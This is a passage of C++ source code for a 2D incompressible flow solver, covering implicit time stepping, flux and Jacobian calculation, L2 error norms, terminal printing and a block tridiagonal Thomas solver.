myarray.f1[i][j].u = 0.0; myarray.f1[i][j].v = 0.0; } } } //-------------------------set intial condition----------------------------// void set_init_cond(carray & myarray) { double DIMx = myarray.DIMx; double DIMy = myarray.DIMy; for(int j = 0; j < myarray.sizey; ++j) { for(int i = 0; i < myarray.sizex; ++i) { double x = (i-0.5)*DIMx; double y = (j-0.5)*DIMy; myarray.s1[i][j].P = P0*cos(PI*x)*cos(PI*y); myarray.s1[i][j].u = U0*sin(PI*x)*sin(2.0*PI*y); myarray.s1[i][j].v = V0*sin(2.0*PI*x)*sin(PI*y);; //printf("f: %f dx: %f\n", f, dx); } } } //--------------------------set ghost cells for Energy----------------------------// void set_ghostcells(carray & myarray) { double DIMx = myarray.DIMx; double DIMy = myarray.DIMy; double dx = 0.0; double dy = 0.0; //set ghost cells top/bottom for(int i = 0; i < myarray.sizex; ++i) { //top wall moving at Uwall myarray.s1[i][0].P = myarray.s1[i][1].P ; myarray.s1[i][0].u = (2.0*myarray.UW)-myarray.s1[i][1].u ; myarray.s1[i][0].v = -myarray.s1[i][1].v ; //bottom stationary myarray.s1[i][myarray.sizey-1].P = myarray.s1[i][myarray.sizey-2].P ; myarray.s1[i][myarray.sizey-1].u = -myarray.s1[i][myarray.sizey-2].u ; myarray.s1[i][myarray.sizey-1].v = -myarray.s1[i][myarray.sizey-2].v ; } //set ghost cells left/right sides for(int j = 0; j < myarray.sizey; ++j) { //left stationary myarray.s1[0][j].P = myarray.s1[1][j].P; myarray.s1[0][j].u = -myarray.s1[1][j].u; myarray.s1[0][j].v = -myarray.s1[1][j].v; //right stationary myarray.s1[myarray.sizex-1][j].P = myarray.s1[myarray.sizex-2][j].P ; myarray.s1[myarray.sizex-1][j].u = -myarray.s1[myarray.sizex-2][j].u ; myarray.s1[myarray.sizex-1][j].v = -myarray.s1[myarray.sizex-2][j].v ; } } //==========================================================================// //-----------------------------IE Array Solving-----------------------------// //==========================================================================// void solve_array_IE(carray & myarray, double tmax, double tstep, double UW, cdata & mydata) { myarray.UW = UW; double ctime = 0.0; //set intial conditions/boundaries set_init_cond(myarray); set_ghostcells(myarray); printf("\n\nRunning size: %d time step: %f\n",myarray.sizex,tstep); int n = 0; int nt = 10; double mdiff = -1.0; while(ctime < tmax-tstep) { ctime = ctime+tstep; //calculate and update flux update_flux(myarray, tstep); //calc implicit time advance solve_LinSys(myarray, tstep, mdiff); get_l2norm_tstep(myarray, mydata); //update boundaries set_ghostcells(myarray); if(n >= nt)//status { printf("Run: %d time: %f diff %f\n",n,ctime, mdiff); nt = 10+n; } if(mdiff<0.000000001)//if convergence reached break; ++n; } myarray.ctime = ctime;//record time printf("Solved numeric at %f time with tstep %f\n",ctime, tstep); } //==========================================================================// //---------------------------LHS Jacobian-----------------------------------// //==========================================================================// void solve_LinSys(carray & myarray, double tstep, double & mdiff) { mdiff = -1.0; //load and solve through all rows crow myrow; for(int j = 1; j < myarray.sizey-1; ++j) { load_row(myarray, myrow, j, tstep); solve_block_thomas(myarray, myrow, myarray.sizex, j); } //load and solve through all columns ccol mycol; for(int i = 1; i < myarray.sizex-1; ++i) { load_col(myarray, mycol, i, tstep); solve_block_thomas(myarray, mycol, myarray.sizey, i, mdiff); } //update old solution n with new solution n+1 update_sol(myarray); } //---------------------------update solution----------------------------// void update_sol(carray & myarray) { for(int j = 0; j < myarray.sizey; ++j) { for(int i = 0; i < myarray.sizex; ++i) { myarray.s1[i][j].P = myarray.f1[i][j].P + myarray.s1[i][j].P; myarray.s1[i][j].u = myarray.f1[i][j].u + myarray.s1[i][j].u; myarray.s1[i][j].v = myarray.f1[i][j].v + myarray.s1[i][j].v; } } } //---------------------------LHS approx factor----------------------------// //--------------------------Load row for Thomson---------------------------// void load_row(carray & myarray, crow & myrow, int j, double tstep) { LHScX c1; for(int i = 0; i < myarray.sizex; ++i) { //get jacobians calc_LHS_constX(myarray, c1, i, j, tstep); if(i == 0) //set left boundary { set_wall(c1, 1); myrow.LHS[i] = c1; myrow.RHS[i].P = 0.0; myrow.RHS[i].u = 0.0; myrow.RHS[i].v = 0.0; } else if(i == myarray.sizex-1)//set right boundary { set_wall(c1, 0); myrow.LHS[i] = c1; myrow.RHS[i].P = 0.0; myrow.RHS[i].u = 0.0; myrow.RHS[i].v = 0.0; } else //set interior { myrow.LHS[i] = c1; myrow.RHS[i].P = myarray.f1[i][j].P; myrow.RHS[i].u = myarray.f1[i][j].u; myrow.RHS[i].v = myarray.f1[i][j].v; } } } //--------------------------Load Col for thomas----------------------// void load_col(carray & myarray, ccol & mycol, int i, double tstep) { LHScY c1; for(int j = 0; j < myarray.sizey; ++j) { //get jacobians calc_LHS_constY(myarray, c1, i, j, tstep); if(j == 0) //set top boundary { set_wall(c1, 1); mycol.LHS[j] = c1; mycol.RHS[j].P = 0.0; mycol.RHS[j].u = 0.0; mycol.RHS[j].v = 0.0; } else if(j == myarray.sizey-1)//set bottom boundary { set_wall(c1, 0); mycol.LHS[j] = c1; mycol.RHS[j].P = 0.0; mycol.RHS[j].u = 0.0; mycol.RHS[j].v = 0.0; } else //set interior { mycol.LHS[j] = c1; mycol.RHS[j].P = myarray.f1[i][j].P; mycol.RHS[j].u = myarray.f1[i][j].u; mycol.RHS[j].v = myarray.f1[i][j].v; } } } //-------------------------------get x Jacobians----------------------------------// void calc_LHS_constX(carray & a1, LHScX & c1, int i, int j, double tstep) { surr s1; //retrieve neighboring cell data get_nsurcells(a1, i, j, s1); double chx = a1.DIMx; double chy = a1.DIMy; tstep = -tstep; //set values for jacobian Ax c1.Ax.rP.P = 0.0; c1.Ax.rP.u = tstep*(1.0/chx)*(1.0/2.0); c1.Ax.rP.v = 0.0; c1.Ax.ru.P = tstep*(1.0/chx)*(1.0/(2.0*BETA)); c1.Ax.ru.u = tstep*(1.0/chx)*( ((s1.ui_j+s1.uim1_j)/2.0) + (1.0/(RE*chx)) ); c1.Ax.ru.v = tstep*(1.0/chx)*( ((s1.vi_j+s1.vim1_j)/4.0) ); c1.Ax.rv.P = 0.0; c1.Ax.rv.u = 0.0; c1.Ax.rv.v = tstep*(1.0/chx)*( ((s1.ui_j+s1.uim1_j)/4.0) + (1.0/(RE*chx)) ); //set values for jacobian Bx c1.Bx.rP.P = 1.0; c1.Bx.rP.u = 0.0; c1.Bx.rP.v = 0.0; c1.Bx.ru.P = 0.0; c1.Bx.ru.u = 1.0 + (tstep*(-1.0/chx)*( ((s1.ui_j+s1.uip1_j)/2.0) - ((s1.ui_j+s1.uim1_j)/2.0) + (2.0/(RE*chx)) )); c1.Bx.ru.v = tstep*(-1.0/chx)*( ((s1.vi_j+s1.vip1_j)/4.0) - ((s1.vi_j+s1.vim1_j)/4.0)); c1.Bx.rv.P = 0.0; c1.Bx.rv.u = 0.0; c1.Bx.rv.v = 1.0 + (tstep*(-1.0/chx)*( ((s1.ui_j+s1.uip1_j)/4.0) - ((s1.ui_j+s1.uim1_j)/4.0)+ (2.0/(RE*chx)) )); //set values for jacobian Cx c1.Cx.rP.P = 0.0; c1.Cx.rP.u = tstep*(-1.0/chx)*(1.0/2.0); c1.Cx.rP.v = 0.0; c1.Cx.ru.P = tstep*(-1.0/chx)*(1.0/(2.0*BETA)); c1.Cx.ru.u = tstep*(-1.0/chx)*( ((s1.ui_j+s1.uip1_j)/2.0) - (1.0/(RE*chx)) ); c1.Cx.ru.v = tstep*(-1.0/chx)*( ((s1.vi_j+s1.vip1_j)/4.0) ); c1.Cx.rv.P = 0.0; c1.Cx.rv.u = 0.0; c1.Cx.rv.v = tstep*(-1.0/chx)*( ((s1.ui_j+s1.uip1_j)/4.0) - (1.0/(RE*chx)) ); } //-------------------------------get y Jacobians----------------------------------// void calc_LHS_constY(carray & a1, LHScY & c2, int i, int j, double tstep) { surr s1; //retrieve neighboring cell data get_nsurcells(a1, i, j, s1); double chx = a1.DIMx; double chy = a1.DIMy; tstep = -tstep; //set values for jacobian Ay c2.Ay.rP.P = 0.0; c2.Ay.rP.u = 0.0; c2.Ay.rP.v = tstep*(1.0/chy)*(1.0/2.0); c2.Ay.ru.P = 0.0; c2.Ay.ru.u = tstep*(1.0/chy)*( ((s1.vi_j+s1.vi_jm1)/4.0) + (1.0/(RE*chy)) ); c2.Ay.ru.v = 0.0; c2.Ay.rv.P = tstep*(1.0/chy)*(1.0/(2.0*BETA)); c2.Ay.rv.u = tstep*(1.0/chy)*( ((s1.ui_j+s1.ui_jm1)/4.0) ); c2.Ay.rv.v = tstep*(1.0/chy)*( ((s1.vi_j+s1.vi_jm1)/2.0) + (1.0/(RE*chy)) ); //set values for jacobian By c2.By.rP.P = 1.0; c2.By.rP.u = 0.0; c2.By.rP.v = 0.0; c2.By.ru.P = 0.0; c2.By.ru.u = 1.0 + tstep*(-1.0/chy)*( ((s1.vi_j+s1.vi_jp1)/4.0) - ((s1.vi_j+s1.vi_jm1)/4.0) + (2.0/(RE*chy)) ); c2.By.ru.v = 0.0; c2.By.rv.P = 0.0; c2.By.rv.u = tstep*(-1.0/chy)*( ((s1.ui_j+s1.ui_jp1)/4.0) - ((s1.ui_j+s1.ui_jm1)/4.0) ); c2.By.rv.v = 1.0 + tstep*(-1.0/chy)*( ((s1.vi_j+s1.vi_jp1)/2.0) - ((s1.vi_j+s1.vi_jm1)/2.0) + (2.0/(RE*chy)) ); //set values for jacobian Cy c2.Cy.rP.P = 0.0; c2.Cy.rP.u = 0.0; c2.Cy.rP.v = tstep*(-1.0/chy)*(1.0/2.0); c2.Cy.ru.P = 0.0; c2.Cy.ru.u = tstep*(-1.0/chy)*( ((s1.vi_j+s1.vi_jp1)/4.0) - (1.0/(RE*chy)) ); c2.Cy.ru.v = 0.0; c2.Cy.rv.P = tstep*(-1.0/chy)*(1.0/(2.0*BETA)); c2.Cy.rv.u = tstep*(-1.0/chy)*( ((s1.ui_j+s1.ui_jp1)/4.0) ); c2.Cy.rv.v = tstep*(-1.0/chy)*( ((s1.vi_j+s1.vi_jp1)/2.0) - (1.0/(RE*chy)) ); } //==========================================================================// //-----------------------RHS Compute Flux-----------------------------------// //==========================================================================// void update_flux(carray & myarray, double tstep) { surr mysurr; vec ftemp; double artP = 1.0; for(int j = 1; j < myarray.sizey-1; ++j) { for(int i = 1; i < myarray.sizex-1; ++i) { //----get surrounding cells and compute new cell----// get_nsurcells(myarray, i, j, mysurr); calc_flux(myarray, mysurr, ftemp, tstep); //-----update current cell----// myarray.f1[i][j].P = tstep * ftemp.P; myarray.f1[i][j].u = tstep * ftemp.u; myarray.f1[i][j].v = tstep * ftemp.v; } } } //--------------------------get surrounding cells-----------------------// void get_nsurcells(carray & myarray, int i, int j, surr & mysurr) { //get all surrounding cell data for one cell ij //pressure mysurr.Pim1_j = myarray.s1[i-1][j].P; mysurr.Pip1_j = myarray.s1[i+1][j].P; mysurr.Pi_j = myarray.s1[i][j].P; mysurr.Pi_jm1 = myarray.s1[i][j-1].P; mysurr.Pi_jp1 = myarray.s1[i][j+1].P; //velocity u mysurr.uim1_j = myarray.s1[i-1][j].u; mysurr.uip1_j = myarray.s1[i+1][j].u; mysurr.ui_j = myarray.s1[i][j].u; mysurr.ui_jm1 = myarray.s1[i][j-1].u; mysurr.ui_jp1 = myarray.s1[i][j+1].u; //velocity v mysurr.vi_jm1 = myarray.s1[i][j-1].v; mysurr.vi_jp1 = myarray.s1[i][j+1].v; mysurr.vi_j = myarray.s1[i][j].v; mysurr.vim1_j = myarray.s1[i-1][j].v; mysurr.vip1_j = myarray.s1[i+1][j].v; } //-----------------------calculate flux for new cell--------------------// void calc_flux(carray & myarray, surr & s1, vec & ftemp, double tstep) { double chx = myarray.DIMx; double chy = myarray.DIMy; ftemp.P = 0; ftemp.u = 0; ftemp.v = 0; //x direction double fp = (((s1.uip1_j + s1.ui_j)/(2.0*BETA)) - ((s1.ui_j + s1.uim1_j)/(2.0*BETA))) /chx; double fu = ( (pow((s1.uip1_j+s1.ui_j)/2.0, 2) + ((s1.Pip1_j+s1.Pi_j)/2.0) - ((s1.uip1_j-s1.ui_j)/(chx*RE))) - (pow((s1.ui_j+s1.uim1_j)/2.0, 2) + ((s1.Pi_j+s1.Pim1_j)/2.0) - ((s1.ui_j-s1.uim1_j)/(chx*RE))) )/chx; double fv = ( (((s1.uip1_j+s1.ui_j)/2.0)*((s1.vip1_j+s1.vi_j)/2.0) - ((s1.vip1_j-s1.vi_j)/(chx*RE))) - (((s1.ui_j+s1.uim1_j)/2.0)*((s1.vi_j+s1.vim1_j)/2.0) - ((s1.vi_j-s1.vim1_j)/(chx*RE))) )/chx; //y direction double gp = (((s1.vi_jp1 + s1.vi_j)/(2.0*BETA)) - ((s1.vi_j + s1.vi_jm1)/(2.0*BETA))) /chy; double gu = ( (((s1.ui_jp1+s1.ui_j)/2.0)*((s1.vi_jp1+s1.vi_j)/2.0) - ((s1.ui_jp1-s1.ui_j)/(chy*RE))) - (((s1.ui_j+s1.ui_jm1)/2.0)*((s1.vi_j+s1.vi_jm1)/2.0) - ((s1.ui_j-s1.ui_jm1)/(chy*RE))) )/chy; double gv = ( (pow((s1.vi_jp1+s1.vi_j)/2.0, 2) + ((s1.Pi_jp1+s1.Pi_j)/2.0) - ((s1.vi_jp1-s1.vi_j)/(chy*RE))) - (pow((s1.vi_j+s1.vi_jm1)/2.0, 2) + ((s1.Pi_j+s1.Pi_jm1)/2.0) - ((s1.vi_j-s1.vi_jm1)/(chy*RE))) )/chy ; //Term added to smooth pressure oscillations double artP = ARTVIS*((s1.Pip1_j-2.0*s1.Pi_j+s1.Pim1_j)/(2.0*pow(chx,2)) + (s1.Pi_jp1-2.0*s1.Pi_j+s1.Pi_jm1)/(2.0*pow(chy,2)))*chx*chy; ftemp.P = (-fp-gp)+(artP/tstep); ftemp.u = -fu-gu; ftemp.v = -fv-gv; } //==========================================================================// //---------------------------Error Checking---------------------------------// //==========================================================================// void get_l2norm_tstep(carray & myarray, cdata & mydata) { double l2sumP =0; double l2sumu =0; double l2sumv =0; double sx = myarray.sizex-2; double sy = myarray.sizey-2; for(int j = 1; j < myarray.sizey-1; ++j) { for(int i = 1; i < myarray.sizex-1; ++i) { double P = myarray.f1[i][j].P; l2sumP = l2sumP + pow((P),2); P = myarray.f1[i][j].u; l2sumu = l2sumu + pow((P),2); P = myarray.f1[i][j].v; l2sumv = l2sumv + pow((P),2); } } double l2P = sqrt(l2sumP/(sx*sy)); double l2u = sqrt(l2sumu/(sx*sy)); double l2v = sqrt(l2sumv/(sx*sy)); //cout << setprecision(8) << fixed << "L2 norm (P|u|v): " << l2P << " | " << l2u<< " | " << l2v << "\n"; mydata.l2normP.push_back(l2P); mydata.l2normu.push_back(l2u); mydata.l2normv.push_back(l2v); } //-------------------------------------l2norm--------------------------// void get_l2norm_2array(carray & myarray, carray myarray2, cdata & mydata, int N) { double l2sumP =0; double l2sumu =0; double l2sumv =0; double sx = myarray.sizex-2; double sy = myarray.sizey-2; for(int j = 1; j < myarray.sizey-1; ++j) { for(int i = 1; i < myarray.sizex-1; ++i) { double P = myarray.s1[i][j].P; double T = myarray2.s1[i*N][j*N].P; l2sumP = l2sumP + pow((P-T),2); P = myarray.s1[i][j].u; T = myarray2.s1[N*i][N*j].u; l2sumu = l2sumu + pow((P-T),2); P = myarray.s1[i][j].v; T = myarray2.s1[i*N][j*N].v; l2sumv = l2sumv + pow((P-T),2); } } double l2P = sqrt(l2sumP/(sx*sy)); double l2u = sqrt(l2sumu/(sx*sy)); double l2v = sqrt(l2sumv/(sx*sy)); cout << setprecision(8) << fixed << "L2 norm (P|u|v): " << l2P << " | " << l2u<< " | " << l2v << "\n"; mydata.l2normP.push_back(l2P); mydata.l2normu.push_back(l2u); mydata.l2normv.push_back(l2v); } //------------------------------L2 norm between known and exact--------------------------// void get_l2norm(carray & myarray, carray myarray2, cdata & mydata) { double l2sumP =0; double l2sumu =0; double l2sumv =0; double sx = myarray.sizex-2; double sy = myarray.sizey-2; for(int j = 1; j < myarray.sizey-1; ++j) { for(int i = 1; i < myarray.sizex-1; ++i) { double P = myarray.f1[i][j].P; double T = myarray2.f1[i][j].P; l2sumP = l2sumP + pow((P-T),2); P = myarray.f1[i][j].u; T = myarray2.f1[i][j].u; l2sumu = l2sumu + pow((P-T),2); P = myarray.f1[i][j].v; T = myarray2.f1[i][j].v; l2sumv = l2sumv + pow((P-T),2); } } double l2P = sqrt(l2sumP/(sx*sy)); double l2u = sqrt(l2sumu/(sx*sy)); double l2v = sqrt(l2sumv/(sx*sy)); //cout << setprecision(8) << fixed << "L2 norm (P|u|v): " << l2P << " | " << l2u<< " | " << l2v << "\n"; mydata.l2normP.push_back(l2P); mydata.l2normu.push_back(l2u); mydata.l2normv.push_back(l2v); } //----------------------------Set a Analytical Solution------------------------------// void set_analytic(carray & myarray) { double DIMx = myarray.DIMx; double DIMy = myarray.DIMy; for(int j = 1; j < myarray.sizey-1; ++j) { for(int i = 1; i < myarray.sizex-1; ++i) { double x = (i-0.5)*DIMx; double y = (j-0.5)*DIMy; double cx = cos(PI*x); double sx = sin(PI*x); double cy = cos(PI*y); double sy = sin(PI*y); double c2x = cos(2.0*PI*x); double s2x = sin(2.0*PI*x); double c2y = cos(2.0*PI*y); double s2y = sin(2.0*PI*y); myarray.f1[i][j].P = (-PI/BETA)*(U0*cx*s2y + V0*s2x*cy); myarray.f1[i][j].u = (P0*PI*sx*cy) - (pow(U0,2)*PI*s2x*pow(s2y,2)) - (U0*V0*PI*sx*s2x*(cy*s2y+2.0*c2y*sy)) -U0*((5.0*pow(PI,2)*sx*s2y)/(RE)); myarray.f1[i][j].v = (P0*PI*cx*sy) - (pow(V0,2)*PI*pow(s2x,2)*s2y) - (U0*V0*PI*sy*s2y*(cx*s2x+2.0*c2x*sx)) -V0*((5.0*pow(PI,2)*s2x*sy)/(RE)); } } printf("setting analytic\n"); } //==========================================================================// //---------------------------Print Functions--------------------------------// //==========================================================================// //--------------------------Print array in terminal----------------------------// void print_array_sP(carray & myarray) { cout << "------------------------------------------------------------------------------------------------\n"; cout << "Solution Pressure:\n |"; for(int i = 0; i < myarray.sizex; ++i) { if(i < 10) cout << " i: " << i <<"|"; if(i > 9) cout << " i: " << i <<"|"; } cout << "\n"; for(int j = 0; j < myarray.sizey; ++j) { if(j > 9) cout << "\nj:" << j << "| |"; if(j < 10) cout << "\nj: " << j << "| |"; for(int i = 0; i < myarray.sizex; ++i) { if(myarray.s1[i][j].P >= 0) cout << setprecision(6) << fixed << myarray.s1[i][j].P <<"|"; if(myarray.s1[i][j].P < 0) cout << setprecision(5) << fixed << myarray.s1[i][j].P <<"|"; } } cout << "\nSolution u:\n |"; for(int i = 0; i < myarray.sizex; ++i) { if(i < 10) cout << " i: " << i <<"|"; if(i > 9) cout << " i: " << i <<"|"; } cout << "\n"; for(int j = 0; j < myarray.sizey; ++j) { if(j > 9) cout << "\nj:" << j << "| |"; if(j < 10) cout << "\nj: " << j << "| |"; for(int i = 0; i < myarray.sizex; ++i) { if(myarray.s1[i][j].P >= 0) cout << setprecision(6) << fixed << myarray.s1[i][j].u <<"|"; if(myarray.s1[i][j].P < 0) cout << setprecision(5) << fixed << myarray.s1[i][j].u <<"|"; } } cout << "\nSolution v:\n |"; for(int i = 0; i < myarray.sizex; ++i) { if(i < 10) cout << " i: " << i <<"|"; if(i > 9) cout << " i: " << i <<"|"; } cout << "\n"; for(int j = 0; j < myarray.sizey; ++j) { if(j > 9) cout << "\nj:" << j << "| |"; if(j < 10) cout << "\nj: " << j << "| |"; for(int i = 0; i < myarray.sizex; ++i) { if(myarray.s1[i][j].P >= 0) cout << setprecision(6) << fixed << myarray.s1[i][j].v <<"|"; if(myarray.s1[i][j].P < 0) cout << setprecision(5) << fixed << myarray.s1[i][j].v <<"|"; } } cout << "\n\n"; } //--------------------------Print u array in terminal----------------------------// void print_array_fP(carray & myarray, double tstep) { cout << "------------------------------------------------------------------------------------------------\n"; cout << "Flux Pressure:\n |"; for(int i = 0; i < myarray.sizex; ++i) { if(i < 10) cout << " i: " << i <<"|"; if(i > 9) cout << " i: " << i <<"|"; } cout << "\n"; for(int j = 0; j < myarray.sizey; ++j) { if(j > 9) cout << "\nj:" << j << "| |"; if(j < 10) cout << "\nj: " << j << "| |"; for(int i = 0; i < myarray.sizex; ++i) { if(myarray.f1[i][j].P >= 0) cout << setprecision(6) << fixed << myarray.f1[i][j].P <<"|"; if(myarray.f1[i][j].P < 0) cout << setprecision(5) << fixed << myarray.f1[i][j].P <<"|"; } } cout << "\nFlux u:\n |"; for(int i = 0; i < myarray.sizex; ++i) { if(i < 10) cout << " i: " << i <<"|"; if(i > 9) cout << " i: " << i <<"|"; } cout << "\n"; for(int j = 0; j < myarray.sizey; ++j) { if(j > 9) cout << "\nj:" << j << "| |"; if(j < 10) cout << "\nj: " << j << "| |"; for(int i = 0; i < myarray.sizex; ++i) { if(myarray.f1[i][j].P >= 0) cout << setprecision(6) << fixed << myarray.f1[i][j].u <<"|"; if(myarray.f1[i][j].P < 0) cout << setprecision(5) << fixed << myarray.f1[i][j].u <<"|"; } } cout << "\nFlux v:\n |"; for(int i = 0; i < myarray.sizex; ++i) { if(i < 10) cout << " i: " << i <<"|"; if(i > 9) cout << " i: " << i <<"|"; } cout << "\n"; for(int j = 0; j < myarray.sizey; ++j) { if(j > 9) cout << "\nj:" << j << "| |"; if(j < 10) cout << "\nj: " << j << "| |"; for(int i = 0; i < myarray.sizex; ++i) { if(myarray.f1[i][j].P >= 0) cout << setprecision(6) << fixed << myarray.f1[i][j].v <<"|"; if(myarray.f1[i][j].P < 0) cout << setprecision(5) << fixed << myarray.f1[i][j].v <<"|"; } } cout << "\n\n"; } //==========================================================================// //--------------------Block Thomas Functions--------------------------------// //==========================================================================// static void SpewMatrix(double Source[3][3]) { printf("%10.6f %10.6f %10.6f\n", Source[0][0], Source[1][0], Source[2][0]); printf("%10.6f %10.6f %10.6f\n", Source[0][1], Source[1][1], Source[2][1]); printf("%10.6f %10.6f %10.6f\n", Source[0][2], Source[1][2], Source[2][2]); } static void SpewVector(double Source[3]) { printf("%10.6f %10.6f %10.6f\n", Source[0], Source[1], Source[2]); } static inline void CopyVec(const double Source[3], double Target[3]) { Target[0] = Source[0]; Target[1] = Source[1]; Target[2] = Source[2]; } static inline void Copy3x3(double Source[3][3], double Target[3][3]) { Target[0][0] = Source[0][0]; Target[0][1] = Source[0][1]; Target[0][2] = Source[0][2]; Target[1][0] = Source[1][0]; Target[1][1] = Source[1][1]; Target[1][2] = Source[1][2]; Target[2][0] = Source[2][0]; Target[2][1] = Source[2][1]; Target[2][2] = Source[2][2]; } static inline void Mult3x3(double A[3][3], double B[3][3], double C[3][3]) { C[0][0] = A[0][0]*B[0][0] + A[0][1]*B[1][0] + A[0][2]*B[2][0]; C[0][1] = A[0][0]*B[0][1] + A[0][1]*B[1][1] + A[0][2]*B[2][1]; C[0][2] = A[0][0]*B[0][2] + A[0][1]*B[1][2] + A[0][2]*B[2][2]; C[1][0] = A[1][0]*B[0][0] + A[1][1]*B[1][0] + A[1][2]*B[2][0]; C[1][1] = A[1][0]*B[0][1] + A[1][1]*B[1][1] + A[1][2]*B[2][1]; C[1][2] = A[1][0]*B[0][2] + A[1][1]*B[1][2] + A[1][2]*B[2][2]; C[2][0] = A[2][0]*B[0][0] + A[2][1]*B[1][0] + A[2][2]*B[2][0]; C[2][1] = A[2][0]*B[0][1] + A[2][1]*B[1][1] + A[2][2]*B[2][1]; C[2][2] = A[2][0]*B[0][2] + A[2][1]*B[1][2] + A[2][2]*B[2][2]; } static inline void MultVec(double A[3][3], const double Vec[3], double Result[3]) { Result[0] = A[0][0]*Vec[0] + A[0][1]*Vec[1] + A[0][2]*Vec[2]; Result[1] = A[1][0]*Vec[0] + A[1][1]*Vec[1] + A[1][2]*Vec[2]; Result[2] = A[2][0]*Vec[0] + A[2][1]*Vec[1] + A[2][2]*Vec[2]; } static inline void Add3x3(double A[3][3], double B[3][3], const double Factor, double C[3][3]) { C[0][0] = A[0][0] + Factor * B[0][0]; C[0][1] = A[0][1] + Factor * B[0][1]; C[0][2] = A[0][2] + Factor * B[0][2]; C[1][0] = A[1][0] + Factor * B[1][0]; C[1][1] = A[1][1] + Factor * B[1][1]; C[1][2] = A[1][2] + Factor * B[1][2]; C[2][0] = A[2][0] + Factor * B[2][0]; C[2][1] = A[2][1] + Factor * B[2][1]; C[2][2] = A[2][2] + Factor * B[2][2]; } static inline void AddVec(const double A[3], const double B[3], const double Factor, double C[3]) { C[0] = A[0] + Factor * B[0]; C[1] = A[1] + Factor * B[1]; C[2] = A[2] + Factor * B[2]; } static inline void Invert3x3(double Block[3][3], double Inverse[3][3]) { double DetInv = 1. / (+ Block[0][0]*Block[1][1]*Block[2][2] + Block[0][1]*Block[1][2]*Block[2][0] + Block[0][2]*Block[1][0]*Block[2][1] - Block[0][2]*Block[1][1]*Block[2][0] - Block[0][1]*Block[1][0]*Block[2][2] - Block[0][0]*Block[1][2]*Block[2][1]); /* Expand by minors to compute the inverse */ Inverse[0][0] = + DetInv * (Block[1][1]*Block[2][2] - Block[2][1]*Block[1][2]); Inverse[1][0] = - DetInv * (Block[1][0]*Block[2][2] - Block[2][0]*Block[1][2]); Inverse[2][0] = + DetInv * (Block[1][0]*Block[2][1] - Block[2][0]*Block[1][1]); Inverse[0][1] = - DetInv * (Block[0][1]*Block[2][2] - Block[2][1]*Block[0][2]); Inverse[1][1] = + DetInv * (Block[0][0]*Block[2][2] - Block[2][0]*Block[0][2]); Inverse[2][1] = - DetInv * (Block[0][0]*Block[2][1] - Block[2][0]*Block[0][1]); Inverse[0][2] = + DetInv * (Block[0][1]*Block[1][2] - Block[1][1]*Block[0][2]); Inverse[1][2] = - DetInv * (Block[0][0]*Block[1][2] - Block[1][0]*Block[0][2]); Inverse[2][2] = + DetInv * (Block[0][0]*Block[1][1] - Block[1][0]*Block[0][1]); } void SolveBlockTri(double LHS[MAXSIZE][3][3][3], double RHS[MAXSIZE][3], int iNRows) { int j; double Inv[3][3]; for (j = 0; j < iNRows-1; j++) { /* Compute the inverse of the main block diagonal. */ Invert3x3(LHS[j][1], Inv); /* Scale the right-most block diagonal by the inverse. */ { double Temp[3][3]; Mult3x3(Inv, LHS[j][2], Temp); Copy3x3(Temp, LHS[j][2]); } /* Scale the right-hand side by the inverse. */ { double Temp[3]; MultVec(Inv, RHS[j], Temp); CopyVec(Temp, RHS[j]); } /* Left-multiply the jth row by the sub-diagonal on the j+1st row and subtract from the j+1st row. This involves the super-diagonal term and the RHS of the jth row. */ { /* First the LHS manipulation */ #define A LHS[j+1][0] #define B LHS[j+1][1] #define C LHS[j ][2] double Temp[3][3], Temp2[3][3]; double TVec[3], TVec2[3]; Mult3x3(A, C, Temp); Add3x3(B, Temp, -1., Temp2); Copy3x3(Temp2, B); /* Now the RHS manipulation */ MultVec(A, RHS[j], TVec); AddVec(RHS[j+1], TVec, -1., TVec2); CopyVec(TVec2, RHS[j+1]); #undef A #undef B #undef C } } /* Done with forward elimination loop */ /* Compute the inverse of the last main block diagonal. */ j = iNRows-1; Invert3x3(LHS[j][1], Inv); /* Scale the right-hand side by the inverse. */ { double Temp[3]; MultVec(Inv, RHS[j], Temp); CopyVec(Temp, RHS[j]); } /* Now do the back-substitution. */ for (j = iNRows-2; j >= 0; j--) { /* Matrix-vector multiply and subtract. */ #define C LHS[j][2] RHS[j][0] -= (C[0][0]*RHS[j+1][0] + C[0][1]*RHS[j+1][1] + C[0][2]*RHS[j+1][2]); RHS[j][1] -= (C[1][0]*RHS[j+1][0] + C[1][1]*RHS[j+1][1] + C[1][2]*RHS[j+1][2]); RHS[j][2] -= (C[2][0]*RHS[j+1][0] + C[2][1]*RHS[j+1][1] + C[2][2]*RHS[j+1][2]); #undef C } } //-----------------------------Solve BT for Rows-------------------------------// void solve_block_thomas(carray & myarray, crow & r1, int NRows, int j) { double LHS[MAXSIZE][3][3][3], RHS[MAXSIZE][3]; int i; //|row|col for (i = 0; i < NRows; i++) { //A LHS[i][0][0][0] = r1.LHS[i].Ax.rP.P; LHS[i][0][0][1] = r1.LHS[i].Ax.ru.P; LHS[i][0][0][2] = r1.LHS[i].Ax.rv.P; LHS[i][0][1][0] = r1.LHS[i].Ax.rP.u; LHS[i][0][1][1] = r1.LHS[i].Ax.ru.u; LHS[i][0][1][2] = r1.LHS[i].Ax.rv.u; LHS[i][0][2][0] = r1.LHS[i].Ax.rP.v; LHS[i][0][2][1] = r1.LHS[i].Ax.ru.v; LHS[i][0][2][2] = r1.LHS[i].Ax.rv.v; //B LHS[i][1][0][0] = r1.LHS[i].Bx.rP.P; LHS[i][1][0][1] = r1.LHS[i].Bx.ru.P; LHS[i][1][0][2] = r1.LHS[i].Bx.rv.P; LHS[i][1][1][0] = r1.LHS[i].Bx.rP.u; LHS[i][1][1][1] = r1.LHS[i].Bx.ru.u; LHS[i][1][1][2] = r1.LHS[i].Bx.rv.u; LHS[i][1][2][0] = r1.LHS[i].Bx.rP.v; LHS[i][1][2][1] = r1.LHS[i].Bx.ru.v; LHS[i][1][2][2] = r1.LHS[i].Bx.rv.v; //C LHS[i][2][0][0] = r1.LHS[i].Cx.rP.P; LHS[i][2][0][1] = r1.LHS[i].Cx.ru.P; LHS[i][2][0][2] = r1.LHS[i].Cx.rv.P; LHS[i][2][1][0] = r1.LHS[i].Cx.rP.u; LHS[i][2][1][1] = r1.LHS[i].Cx.ru.u; LHS[i][2][1][2] = r1.LHS[i].Cx.rv.u; LHS[i][2][2][0] = r1.LHS[i].Cx.rP.v; LHS[i][2][2][1] = r1.LHS[i].Cx.ru.v; LHS[i][2][2][2] = r1.LHS[i].Cx.rv.v; RHS[i][0] = r1.RHS[i].P; RHS[i][1] = r1.RHS[i].u; RHS[i][2] = 